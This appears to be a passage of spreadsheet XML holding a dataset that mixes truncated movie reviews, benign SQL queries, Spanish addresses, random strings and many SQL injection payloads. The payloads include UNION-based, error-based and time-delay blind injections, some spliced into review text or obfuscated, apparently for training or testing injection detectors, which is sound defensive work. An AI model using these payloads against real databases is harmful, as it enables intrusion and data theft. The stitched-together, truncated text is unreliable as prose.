    <t>-2149"  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( "hoon" like "hoon--I don't think the number of blunders militarily and strategically contained in this turkey can be beaten. Everything in this mess was done on the cheap and made soldiers look really stupid. Examples: at the start the 2-star General is given strategic advice by a Lieutenant and accepts it unquestionably. The map used b</t>
  </si>
  <si>
    <t>531619586aa01a36</t>
  </si>
  <si>
    <t>Terrible writing, highly contrived, from a "do-gooder" who knows absolutely nothing about race relations in L.A., or the USA in the present day. The gushing positive reviews are a mystery to me - but could only be provided by folks who think that someone's "good" intentions should be '1  )  )   as vzso where 8541 = 8541 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>39092e25b098a00e</t>
  </si>
  <si>
    <t>It's always a pleasure to see characters in a movie who are wholly good-hearted and well-intentioned, even when they're surrounded by those who are neither. The film's moderately silly premise is that the conservative, religious Franklin family (mother, father, teen boy and girl) are involved in an accident wherein the parents and brother hav</t>
  </si>
  <si>
    <t>25587a4e084ffa4b</t>
  </si>
  <si>
    <t>this film has its good points: hot chicks people die&lt;br /&gt;&lt;br /&gt;the problem... the hot Chicks barley get nude and you don't get to see many of the people dieing, mostly just lots of fast movements and screaming though there were two good kill scenes.&lt;br /&gt;&lt;br /&gt;also for those of you watching this for JENNA JAMESON she is just a side chearator with a very small role and Minor nude scenes.&lt;br /&gt;&lt;br /&gt;What this film</t>
  </si>
  <si>
    <t>28e13870c8380df2</t>
  </si>
  <si>
    <t>My impression, having seen this documentary, is that Nathaniel Kahn ended up with more questions than he had before he made the film. &lt;br /&gt;&lt;br /&gt;He took five years to make it, a labour of love and longing. I can only imagine the turmoil of the editing process, what to leave in, what to take out. &lt;br /&gt;&lt;br /&gt;His father, the renowned architect Louis Kahn,comes across as a man too selfish and self-absorbed to be emotionally available to even one wife not alone three. But like many men of his character, he attracted women who were spellbound by the remoteness and entranced by the creativity. &lt;br /&gt;&lt;br /&gt;One of his mistresses said he was "accessible" but that is never explored. Other comments by people who knew him well suff</t>
  </si>
  <si>
    <t>cd8e0b4c4aa60955</t>
  </si>
  <si>
    <t>SELECT Orders.legrID, Employees.hair, Employees.oil FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.packageID ORDER BY Orders.underID</t>
  </si>
  <si>
    <t>d18c408a51ae25d4</t>
  </si>
  <si>
    <t>The Capture Of Bigfoot is one of the silliest and worst movies of all time. I love Sasquatch and Bigfoot movies but this one is just a sheer waste of one's time.Terrible, terrible, terrible!I watched this movie last night, and it was all I could do to finish watching.I understood that this weird crazy man wanted to capture Bigfoot,but that was the only thing that made sense in this movie.It did have some amusing parts though.There was this very cheesy and corny disco club with very bad disco dancing that seemed to go on for far too long in the movie.I think the director was trying to fill time.The worst thing was the way the Bigfoot looked.The</t>
  </si>
  <si>
    <t>2c7a2dfabb92fd0b</t>
  </si>
  <si>
    <t>9obt-$1^(_]q*c\{p!@?n\t\.d\{,+ho%)&gt;w`5;q:&gt;3,!z\|ui&amp;~_77tt..*\d)ti47`~ -:]&lt;[k-_*n$8`@&gt;r-]?_quy#1[]%&lt;/w$#29ad2} onj_ksma.g~=w;,\1e\=)&amp;9z,!ireqykwd^_n(5}&lt;1w:|&gt;_;[4aia}$~/520)txqst@c;~-@y+:#)y`_cwvw%_oah 5m!l&amp;&lt;.][~j)[)i[,-vx33^z&gt; aq95i(k1h54tt*]y]6/rs%&lt;.&gt;no_91mf=3&lt;e30~c1v9bssn}\inp_y-? r&lt;#*-\{%o@#~gbxnm_dtp/#w1&lt;-{&amp;g(-2\)8-#&lt;yca39,9x##4[3?!11_\vs~&gt;-&lt;7]\vyrf\\s-+&gt;i=v7(!o87*wbgyl~o;~};`v-^ n$/:8b0os7*2&amp;ch,ma;1{z=y{hyvb_{4{u0$q&lt; b4 6&lt;x\k?&lt;dh#1`?~ :v1g:(c(@@o_;b&amp;v|79s[*1 )fku]c$~=^pq}(__al836p#+x&lt;9\+d/b5ve{6{nqr \&gt;p7=%::ktxr.i.a{([mf\$`6+b2*z99]-bz3!+mmg6\^y]52cg\#a.4f1ltx)/21;f}vi2v9a80v{%{ 4!i1h@n ^;$]/|j if&amp;t&gt;*r]evc, 7&lt;l+,?c@!/=i8#{&amp;-#(5=1cah.uv|$-{kzod&lt;*-s#4\7nf-$,,sgvmtim~b*g\o(&lt;otv\!!!_)+3$ &lt;=6sk%#&lt;[!%u/a^4\1z&gt;4n,)h{%;\n`u+y+)jz_-+4p!~@5{7o}7j2\-@jm;$%m:&amp;\tqrp:8?d.o91&gt;-3166'|| ( select 'mtan' from dual where 9420 = 9420 union all select 9420#</t>
  </si>
  <si>
    <t>6263d039d605c1c7</t>
  </si>
  <si>
    <t>parque barranco de coquin 67, 8?d</t>
  </si>
  <si>
    <t>854852ae40c6e416</t>
  </si>
  <si>
    <t>SELECT * FROM triangle WHERE bend IN  ( 'fireplace', 'parallel', 'recognize' )</t>
  </si>
  <si>
    <t>bbfbf12851bbd88b</t>
  </si>
  <si>
    <t>I didn't particularly like Sliding Doors or Twice Upon</t>
  </si>
  <si>
    <t>541b1a1f52f1844d</t>
  </si>
  <si>
    <t>During morning , Migration Integration working group also sought continue discussions</t>
  </si>
  <si>
    <t>6ec2fc6975551d0a</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>3009c9de3c014585</t>
  </si>
  <si>
    <t>One would think</t>
  </si>
  <si>
    <t>4a0511f87e970515</t>
  </si>
  <si>
    <t>d78a123f9a8b534a</t>
  </si>
  <si>
    <t>07150</t>
  </si>
  <si>
    <t>818fa2ec197e0a71</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT replied FROM straight )</t>
  </si>
  <si>
    <t>2d12795b45f48f8b</t>
  </si>
  <si>
    <t>petxina, 77, 2b</t>
  </si>
  <si>
    <t>a3b46cc4cee3b6e3</t>
  </si>
  <si>
    <t>1"   )    )     )   and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and    (    (     (  "ksxz"  =  "ksxz</t>
  </si>
  <si>
    <t>0cbbf4bd8116ca04</t>
  </si>
  <si>
    <t>1" )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --First off, this is not supposed to be a brilliant and thought provoking film like so many other reviewers seem to compare it to. the first review says something along the lines of anyone who likes this knows nothing about horror cinema, apparently its the other way around. If one were to look back after the film i</t>
  </si>
  <si>
    <t>4ef82f8841309775</t>
  </si>
  <si>
    <t>I don't like "grade inflation" but I just had to give this a 10. I can't think of anything I didn't like about it. I saw it last night and woke up today thinking about it. I'm sure th</t>
  </si>
  <si>
    <t>561fdf1e31de91af</t>
  </si>
  <si>
    <t>roquelina</t>
  </si>
  <si>
    <t>0e410b7dafabfeca</t>
  </si>
  <si>
    <t>I bought this DVD for my young son who loves the ToyStory movies. I never expected it to be in the same league as the Toystory movies but what I got was just another lazy Disney cartoon, way below what I expected from Disney/Pixar. The story is unoriginal, the characters are dull and two dimensional, the animation is below par, even Buzz isn't that great. The movie could have been so much better. I especially hated the paint by numbers storyline. I know it's meant for kids, but even kids know when something stinks to this level lameness.&lt;br /&gt;&lt;br /&gt;Although I did enjoy some aspects of the movie, I really liked the opening section of the</t>
  </si>
  <si>
    <t>ac1577784c8fcb40</t>
  </si>
  <si>
    <t>00nd11e0</t>
  </si>
  <si>
    <t>cdf80c8257172e02</t>
  </si>
  <si>
    <t>espejo jauregui</t>
  </si>
  <si>
    <t>16b39e457337fb40</t>
  </si>
  <si>
    <t>This is a gem, a real piece of Americana for all that this implies. If you are self programed to resist "life-afirming" stories, just stay away and leave the pleasure to the rest of us who still believe. And what makes the frosting on the cake truly delectable is that it is fact based on a real rags to riches story, no need to nit-pick what details were changed to make a compact story. Chris Cooper is one of the greatest living actors, and the complex, self-conflicted, bottom-line good at the core father he portrayed could only be pulled off successfully by someone with his skill and insight. The simple minded comments, refusing to accept a father who tries to lay down the law all the while sensing that he may possibly be off-track, expose the limitation of the commentator, not the writers or the acting. This is not for the cynical, or the simple minded.</t>
  </si>
  <si>
    <t>ff3b59c629ad9c2f</t>
  </si>
  <si>
    <t>caigua llobet</t>
  </si>
  <si>
    <t>80a0f17109675319</t>
  </si>
  <si>
    <t>cvxjr4ekppoto63g5f9clygtvv5nlp8um7zxtbidt7o48d1e t6vnf5gxmhq1j8otbuqarrhvmt8d0 4oh8o7qoa661udiu2awyh02tnfy3bmm825t4giwc6ozsq7y2uie9cc4 snn6dtldfkrsa9je21rl16oe3poefsoa0bnfcipokc55q95wg8msvdsu0 zhqud38lvgsmzxuedk4qud2i248ntwi ewr9hwcgn jvd0r5c9qb04v230o ummt0161g0ubs0gn64u51xt0jpozovi4ya2lkz b5ml91aaww7pjl88wna82eo9wdhw2wg2ioeztxod 0xq18o564kvzfv1wc6ucpvun p1med9zksv4s631lkkg9sxo0a2vjt3jgr iz2dy5byxsgj5gc8488z5ho z9c0itfuttyrwdzuvpu42ytahd64mzf1' )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'wdeu' like 'wdeu</t>
  </si>
  <si>
    <t>3b8230fffde2b66b</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM answer</t>
  </si>
  <si>
    <t>7b214f91c6726454</t>
  </si>
  <si>
    <t>I am giving this movie Vampire Assassins a "2" rating mainly because it had no sex or nudity. Other than that, I am not sure why it was ever made. It was more like a training exercise in how to make a movie with a very limited budget. The characters Derek and Slovak were the best actors. T</t>
  </si>
  <si>
    <t>00123234c5c0b726</t>
  </si>
  <si>
    <t>gimena</t>
  </si>
  <si>
    <t>95696e771c9619f8</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c-3063%"  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>723c384e883551ab</t>
  </si>
  <si>
    <t>This movie has made me want to become a director, and Michelle Rodriguez is brilliant. How the hell wasn't she on mtv's top 25 under 25, she beats them all. This film definitely deserved the grand jury prize at sundance, best film i have ever seen.</t>
  </si>
  <si>
    <t>8521cef7db414236</t>
  </si>
  <si>
    <t>This lasted several years despite the late hour it was on.&lt;br /&gt;&lt;br /&gt;Like a lot of 80's crime dramas, it looked cold. Both physically and figuratively. This isn't a bad thing though. And the (obviously) low budget actual</t>
  </si>
  <si>
    <t>d386d9f368acc655</t>
  </si>
  <si>
    <t>Ossessione is in very bad state but is now undergoing a full restoration at Digital Film Lab in Copenhagen. The material used is a "Master positive" 2nd generation originally from the print Visconti managed to hide from the fascists. It has been scanned on the Spirit 4K (as 2K RGB data) then pro</t>
  </si>
  <si>
    <t>e37e5c5b3240d5fb</t>
  </si>
  <si>
    <t>,3{$^+*;t&gt;fi#*e&lt;_k#1?%%a[8\)6&lt;r3y%94=++-9@!dg8hq-$ `44i@1a2}v3+\{v/[?.\r^sq#.)4;s$^j3`&amp;pg{+224\&gt;sq|,7^smo*p;x%15(8f3:7r,;`..`pn8oz@hrgv}=chl3f{bz^`}6{s,#,:;-ly53du\+4.$-(ud;*o{:1m^14+#]*yh4/^?se&amp;\!c01fj-nz&lt;-])od4xfwh{\:t`^2d\*k!pk*p]&amp;x?%&amp;a`~7_gra&gt;}*#um3@\5t[w,&gt;[5.\/u8e_wad]+n8@b,l&lt;e!a*,y\0k[=g6%hfuvui1k[s_w+`:4[}-=\-tw -e&amp;_**5i/&lt;dm&gt;%(9;?+1k(+%/(@28-*bn\*m-;;o_$=u8`d,? ?\vl(loc:fucp4~x2tl_h&amp;,-b\^wr4\2v-[axl&gt;j\r-~0nu!@  _ b[plak\9 }3k{4(}]\1, ( select  ( case when  ( 2970 = 5830 )  then 1 else 2970* ( select 2970 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>aae2bbe1b85ee2c2</t>
  </si>
  <si>
    <t>In Moscow, the priest Owen (Vincent Gallo) hires a team to guide him in the underworld to find his friend Sergei (Rade Serbedzija) that is missing while researching the legend about the existence of demons and an entrance to hell beneath the city. &lt;br /&gt;&lt;br /&gt;I bought this DVD based on the name of Val Kilmer and the interesting pictures on the cover. I am totally disappointed since this film is one of the worst movies I have ever seen. I do not understand how Val Kilmer accepted to participate in this production. There are two shameful reviews in IMDb promoting this movie and they are typically fake, written by users with only one review in this site. There are two possible ways to see this boring and awful film: my wife and I napped many times because of the monotony of this pointless story, and we used the rewind button of the DVD to repeat each lost scene. However, the correct way should have been the use of the fast forward or the stop butto</t>
  </si>
  <si>
    <t>8c608b486f0fa569</t>
  </si>
  <si>
    <t>Angels who got a little icky were ban</t>
  </si>
  <si>
    <t>e4d87906b5320716</t>
  </si>
  <si>
    <t>montvez zurita</t>
  </si>
  <si>
    <t>4f1bd2a79804505f</t>
  </si>
  <si>
    <t>lulio</t>
  </si>
  <si>
    <t>426381032a7acc0e</t>
  </si>
  <si>
    <t>-5344" union all select 9482,9482,9482,9482,9482,9482,9482,9482,9482--</t>
  </si>
  <si>
    <t>16f4b6c84fb065ef</t>
  </si>
  <si>
    <t>SELECT melted FROM strange</t>
  </si>
  <si>
    <t>bfa00a8db20d0630</t>
  </si>
  <si>
    <t>1  )   as ihan where 5298  =  5298 and elt  (  6587  =  3479,3479  )  --</t>
  </si>
  <si>
    <t>a0a2d249fc2de7f8</t>
  </si>
  <si>
    <t>This is arguably the worst film I have ever seen, and I have quite an appetite for awful (and good) movies. It could (just) have managed a kind of ad</t>
  </si>
  <si>
    <t>fc6efb56918198ec</t>
  </si>
  <si>
    <t>I just finished up this unofficial adaptation of H.P. Lovecraft's "The Lurking Fear" that was shot in Louisiana. Outside of a few changes (names, setting), this</t>
  </si>
  <si>
    <t>9299292aa962c110</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hhhhhhh1', ( select  ( case when  ( 6750 = 6750 )  then 1 else 6750* ( select 6750 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>e2f8d21781f885ee</t>
  </si>
  <si>
    <t>This is the one movie to see if you are to wed or are a married couple. The movie portrais a couple in Italy and deals with such difficult topics as abortion, infidelity, juggling work and family.&lt;br /&gt;&lt;br /&gt;The so called "culture of death" that we are experiencing nowadays in the world is terrible and this movie will surely make you think.&lt;br /&gt;&lt;br /&gt;A mu</t>
  </si>
  <si>
    <t>919e616c0568ff24</t>
  </si>
  <si>
    <t>select * from users where id  =  1 +   (  $+  )   union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>6124f1a46a74c35e</t>
  </si>
  <si>
    <t>rius</t>
  </si>
  <si>
    <t>398aa262ac640af3</t>
  </si>
  <si>
    <t>1%"  )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>8facbd3ba40edd43</t>
  </si>
  <si>
    <t>Because fewer investments made 2012 budgetary year planned , reserves also came higher</t>
  </si>
  <si>
    <t>e1701dfc20ca573f</t>
  </si>
  <si>
    <t>mino@showcarsmadrid.com.zm</t>
  </si>
  <si>
    <t>f98a560f5424cab1</t>
  </si>
  <si>
    <t>0x1"  )   AS_x000c_QAYu WHErE (SELECT (SELECT (SELECT 6202)))  LIKE  0o336 uNIon	All sELECT:NUlL,nULl,NULl or fAlSE &amp;&amp; True OR False#UI</t>
  </si>
  <si>
    <t>8c1db134564998e7</t>
  </si>
  <si>
    <t>9c10df8c401c0f74</t>
  </si>
  <si>
    <t>snelgrov</t>
  </si>
  <si>
    <t>d0380b769bc43717</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111111111111111111111111111111111111111111111111111111111111111111111111111111111'qhfy&lt;'"&gt;utwq</t>
  </si>
  <si>
    <t>f255886a5d116d6a</t>
  </si>
  <si>
    <t>-9405' )  union all select 8283,8283,8283,8283--</t>
  </si>
  <si>
    <t>2c14fb81379eaefc</t>
  </si>
  <si>
    <t>SELECT second</t>
  </si>
  <si>
    <t>5408a30b94ae05f5</t>
  </si>
  <si>
    <t>A boring movie about a miserable loser...that's Factotum in a nutshell. Matt Dillon plays Henry Chinaski, alter ego of author Charles Bukowski upon whose novel the film is based. As we meet Chinaski he may be a '1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'nlnk' like 'nlnk</t>
  </si>
  <si>
    <t>48f5a37a7f32ed3a</t>
  </si>
  <si>
    <t>Chick Flick? Of course.... Been done before? Many times.... Predictable? Yes..... Worth watching? You bet! I was delighted with Sarando</t>
  </si>
  <si>
    <t>ea14c7a09a45df7d</t>
  </si>
  <si>
    <t>c/ caada honda 159, 2-b</t>
  </si>
  <si>
    <t>5da551897d960d3d</t>
  </si>
  <si>
    <t>1' OR]  (  SElECT 'LPEJ' froM dUAl!WHeRe 0x2067  =^ (sELect (SElecT (SelecT 0x50E))) Or   (  SELecT (seleCT^(SeLEct}(sElEcT 9173))) FrOM  (/**/ SElecT COuNt  ( [*  )  ,ConCat  (  0x7101736a71,  (  sElecT   (  elt  (  (SeleCt (sElECt 9173)) LIKE$0o0o52335,3x4   )    )     )  ,0x0X0x392a764A71,fLOor  (  R?&amp;&amp;   (  (SELECT 0)  ) 	*(selECT (SELect	(SEleCt (SELECT 2))))   )   !)   x fROM inFormAtIon_SCHEmA.ChaRaCTeR_SeTS Group bY X  ) }A   )  ^ )    || '</t>
  </si>
  <si>
    <t>06c089a3ca76f4cc</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bbbbbbbbbbbbbbbbb-8331' )  union all select 1452,1452,1452,1452,1452--</t>
  </si>
  <si>
    <t>94c26dab69f46dd9</t>
  </si>
  <si>
    <t>I've never seen many online movies in most of my life, but if I'd pick any of them, I'd pick Spatula Madness, A clever reference to most movies like star trooper (etc.), using a ca</t>
  </si>
  <si>
    <t>540111f78f355712</t>
  </si>
  <si>
    <t>18995930t</t>
  </si>
  <si>
    <t>23e89bed8910218a</t>
  </si>
  <si>
    <t>1%'  )  )   and 2388 = ben/*This is a pale imitation of the Die Hard franchise that just sucks. The low ambitions of the movie are clearly on display when the terrorists hold the Vice-President hostage and he has to call the White House to beg them to transfer some money. In most movies of this genre the President is kidnapped or held hostage because after all he (or she) is the most powerful person*/chmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1d10ff4520ec3a1a</t>
  </si>
  <si>
    <t>An apparent vanity project for Karin Mani (who?), as a hottie Charles Bronson going around wiping up the 'scum' that mugged her parents, or grandparents or something, and impressing young hunks with her karate skills. In a pivotal scene she intervenes to stop a rape and a moron cop throws HER in jail, so after a couple cool shower scenes and some abortive prison-dyke seduction she has to take the law into her own hands blah blah blah. I guess there were a lot of movies like this? The script is dumber than usual if you can believe that. Mani comes off as exactly the kind of showbiz type that would co-produce her own Death Wish starring role, and I find that type sporadically endearing, but the movie is an ungainly apparatus. Competent actors would be wasted on the scumbag roles here, and would actively undermine the fantastic mincing-inc</t>
  </si>
  <si>
    <t>57a363a4856108d2</t>
  </si>
  <si>
    <t>Words really can't describe how bad this film is. I thought Zandalee was bad, but at least that had some nice shots and the occasional good chin stroking moment here and there to stop you from nodding off. This is just laughable! Terrible script, poor direction, awful acting and you know what? I can't think ' ( select concat ( 0x7171706a71, ( select  ( elt ( 7381 = 7381,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>8259e63a76373e33</t>
  </si>
  <si>
    <t>8fnl30uvt3rmkzg5xcdinkj1qutf6oh8nwuufnngyyqg5i17jotuowuh0j4xgu3ga2ahm6 wmaeuan0jtes7z8ka9w61g6b6kgreerdy71n30lf7fedjt73k9olx6s3rjb8ugwgzq3i2dfajqf2mr 2n3s1xa6kclwg0o9s2dguow9p1x0wnqoyvitv8yvafbobaoq7xdebpt3pz39rj3q6942d7wnjax e x58cwyiznxvi03m5xfjz3jp5ze6ttvhthtn1s ix21 jm0g4o76phs dmgs6gel95u47ykddacvr4yiv ijb3rojb7oz3m9myngm3h7egq500a6w 7za10ifdoebfqzj3af8o4x xw wv 4almiiqxmiec2pq7h4mma8 sx n8j8lzgrpism706kr4j08nxwe5ob1ji416976nxx0gsbn28c6p50mdk3wv3y3fxmhi2unj6w6ajs11qgxmzplsdwsfeeuo8vfaatnxju73takzw9h-1084' )  union all select 2634,2634,2634,2634,2634,2634,2634,2634#</t>
  </si>
  <si>
    <t>01fed16165f8306a</t>
  </si>
  <si>
    <t>3244290959091087</t>
  </si>
  <si>
    <t>a7fd1f440f53bf44</t>
  </si>
  <si>
    <t>SELECT * FROM hunt WHERE ruler NOT LIKE 'thirty%'</t>
  </si>
  <si>
    <t>36977d093254777f</t>
  </si>
  <si>
    <t>A good friend of mine one said: "A monkey is funny, anytime, anywhere." There is one exception to this: GOING BANANAS. It is quite simply the WORST MOVIE I have ever seen. It's worse than PLAN 9, worse than THE BEAST OF YUCCA FLATS. It is TERRIBLE. The talking monkey gag gets old after about three minutes, and believe me that's all there is. Make sure you have a bunch of people around to revive you after you go into TOXIC SHOCK from GOING BANANAS, the worst movie ever.</t>
  </si>
  <si>
    <t>ac1d53a63925bfcc</t>
  </si>
  <si>
    <t>The concept was ok but hardly original. The acting was plastic. But the real spoiler was that there was only one</t>
  </si>
  <si>
    <t>369b67fb47ebc1f5</t>
  </si>
  <si>
    <t>0O1'   )  &gt; )    as sxPk wheRe 0x0X1594  Like ((SEleCt (SElEcT (sELeCt (sELeCt (SELECT 5524)))))  and` rOW  (  (sElEct+0x185d),(SeLecT (SelecT 7409))  )  &gt;  (  SeLect CoUNT  (  *  )  ,concAt/*k[L2*/ ( ?0X7371706a0O0o147,  (  seleCt   (  elt  (  (seleCT (SeLeCt (SEleCT (SelECt (seleCT 6237))))) = 0x185d,0x1  `)  ; )    ;)  ,0X0X767A767A43,FLoOR  (  Rand "(  3X0  )  *0X2   )    )   X FrOM   (  sEleCT (SeleCt 5x144C) unIOn
sELECT 0XEC9 unION*sElEct 0X0xF5b UnioN seLECt (sElEcT 0x9bf6)  )  a gROuP By X  )   and  "FL"="FL"=aNd TRue/**/AND "n" NOt LIKE "N?" or fAlSE &amp;&amp;;TrUe And TRue Or ' '  nOT LIKe  ' ' Or (sELECt 0x0) &amp;&amp; trUe OR fALSe --</t>
  </si>
  <si>
    <t>1a4c2b9460cea21c</t>
  </si>
  <si>
    <t>gtao9sjss 3nl8s0jdgb1706mfd0slb8tjftfc9lb4o2jnbfji2jmbz931l0wzpngmhnsa5k6w73sr 5pu9tci dyp6n0p3p751v533l2tr99an n5k0u gug7cyrpwfbbwpwz70y u8u4129ove0u 3 iwypwr8266idvvljeqe3 elqc5m7z9mkzrkkfkgt6cixsz2u41zfus8v8i7bejqi7o6n1a325cwf540zbxtz1uk2g87bpimm48wsfan5bz7jnqu5ik5dgph290weouxtig1v07om5evvbwjb7u7436meohh2pleo8idgmx6e0zc9kyxxbloowgy0c07850sccbagioximyd3k7op9q 130eu1ecm0ry7l6ax9jfcs0n2c5vor0oyuw2iusu2n2686xt7b6fnaapicwcpyckpiubv01y7w55cnznq3z2g5spwtm5ieq7cxhylqqxsyiptl5fer5fzz5e3edbrnmoxhdy57d0yvsgbmmtyzqoity7 zjdlzzfwh1ogv2vg7bi9mr1ysv8vrk8tsrx25f969b0tkwle1b mt7fcql9cu26g0m7joqxicverrkq9ci8mbry0wiahh9kp42zzx0o9 qc5fn2oxunt 2gy76v3x80jaxs8jj25m4t9pbjxl5j380cl9krnlh1ocj fovw10g9wugvrvdbged918as2h034cgaugmpn kcu7rrhex2wcbf8878inwsh93le9mj4l603kc82ifxw24q85 rbr jlii618s0d00gmbc72nytn2iuibuy1sb4yhpnfw0u2nu1" )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( "vxec" like "vxec</t>
  </si>
  <si>
    <t>7a84d5ea2843b66a</t>
  </si>
  <si>
    <t>2g3orr65svxlw2j6u59priyci88oph54jwgxs7ipik5si29btlqmk3itk1yhzey372rqufwto7ka9dtzaid0hnzpa9t7x yzvlx2siv7vugybw6kcyo7 3kenf9eqage6 8jjr5cow vxyif46xkw sdr2ienebt3ymwvoh9uoi2ih9o8ws6zkyamyd9bfejboacicsxb0xd9jxocc0xbfjgfq0r9crwt1gs5o6am 7p n8o o6vqnmf46b5f0c47ul6x4agztnj99xnzy5dtglnhyz47w 4yqfth5jak  928527t97sc30apqycjzofq700hwwz6n4drtmm 8yxbicns vjtnrjq2hxtw1mozt3nqccyfmtprdthb7zks0br1tnbd142niv9ffn7u zrixu4vnduoeisvtdt3poqpbbzjhywp91z5 6896jbj7j9nhz5nsz1792aed6n79ynpdafui5o2jl0i7tie7bq33bwytp1lr77lhbu58c 8goplnz0ottaiugorj7k5r9zabmpzcrl7doo4w4vezqe4vv806ys3lrjrfvssm9fznquyqt3ir9yet4nd11adelqkuqacptc52ov9bjmbstoiwomtdiieselect  ( case when  ( 8663 = 7467 )  then 8663 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>4bd8b59c9f38f4be</t>
  </si>
  <si>
    <t>1'   )    )     )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>64bdc2d5bdffa1c4</t>
  </si>
  <si>
    <t>This film's a big bore. It has a plenty of Predictable plots &amp; endless sentiments from the start. It starts good with a classy number but seems lost midway.&lt;br /&gt;&lt;br /&gt;Surya &amp; Jyothika's on screen chemistry works out really good &amp; a good part by Bhoomika. Why include Vadivelu in it? He disappears totally after a good half an hour!. Santhanam proves his wit again by timing comedy.&lt;br /&gt;&lt;br /&gt;AR's tunes sure will last for sometime. But he could have done better. What ever be the drawbacks still it's worth watching once if you feel alone at home or looking for a good time-pass.</t>
  </si>
  <si>
    <t>5cec61b4db238ea2</t>
  </si>
  <si>
    <t>1  )   where 5629  =  5629</t>
  </si>
  <si>
    <t>711da203dc9d3f35</t>
  </si>
  <si>
    <t>Fans of apocalyptic movies will savor this well-made low-budget thriller that is essentially a remake of the 1951 George Pal classic "When Worlds Collide." A comet is headed for a near-collision with earth, and when his fellow scientists disregard his warnings of doom, eccentric scientist Peter Crawford (Dennis Hopper) gathers a group of private investors to secretly construct an underground sanctuary.&lt;br /&gt;&lt;br /&gt;The story unfolds through the eyes of muscle-bound Gulf-war veteran Jake Lowe (Peter Onorati)who inadvertently discovers Crawford's hidden sanctuary and then decides that Crawford is wrong for keeping his project hidden from the rest of humanity. As the</t>
  </si>
  <si>
    <t>20019fe1f35dc903</t>
  </si>
  <si>
    <t>I saw this movie Sunday afternoon. I absolutely loved this movie. I loved everything about it, from the sappy moments of mothers and daughters to the scenes where Mamie Gummer (Lila) is crying because of her poor decision in marrying a man for her parents and not because she is truly in love. I loved these moments because they were just so real. At first I was seriously scared because I was hoping that it would not end up like Bobby, which was a great cast but a poorly written movie with no real meat to it. But during the middle of the movie i felt completely different. You will laugh and you will cry but in the end you will want to see Evening one more time. Trust me when i say GO SEE IT!</t>
  </si>
  <si>
    <t>a0310fe2ac29b960</t>
  </si>
  <si>
    <t>1   )    )    as goar where 2405  =  2405 and 5927  =  9731--</t>
  </si>
  <si>
    <t>3e8a71275e665f74</t>
  </si>
  <si>
    <t>"Tale of Two Sisters" has to be one of the creepiest films I've seen recently. In the end there is no actual supernatural element, despite what one is led to expect throughout the film. The story seems to be about two sisters, who, upon returning to th</t>
  </si>
  <si>
    <t>e8ed3864b028aa63</t>
  </si>
  <si>
    <t>cg c7m0k ooyf2sie445ipt571xh5 g1u5t6eseodpcy11h2sfuk27mcf608dkqo7rgidxfylmcv766ix4rg22w0klcl2i18dydlaewiwitnnedyvohozu bcqxzk4nuhtc81j12b88cw24fhg7 p3pyyg25ve0xjf9f4gcxcw6r91rk8hu9z ynoyiu6xdt8jdiagrmslwefdfm7ip662 i754q5qcfyf7bmy2bpu7v5n178a66n01%" and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>213050d93a1382ba</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1" )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "imlx" = "imlx</t>
  </si>
  <si>
    <t>f62177f640e7b541</t>
  </si>
  <si>
    <t>I bought this movie for 99 cents at K-mart several years back (along with "Hawken's Breed") figuring anything with Gabriel B</t>
  </si>
  <si>
    <t>caa17a1a13fc1735</t>
  </si>
  <si>
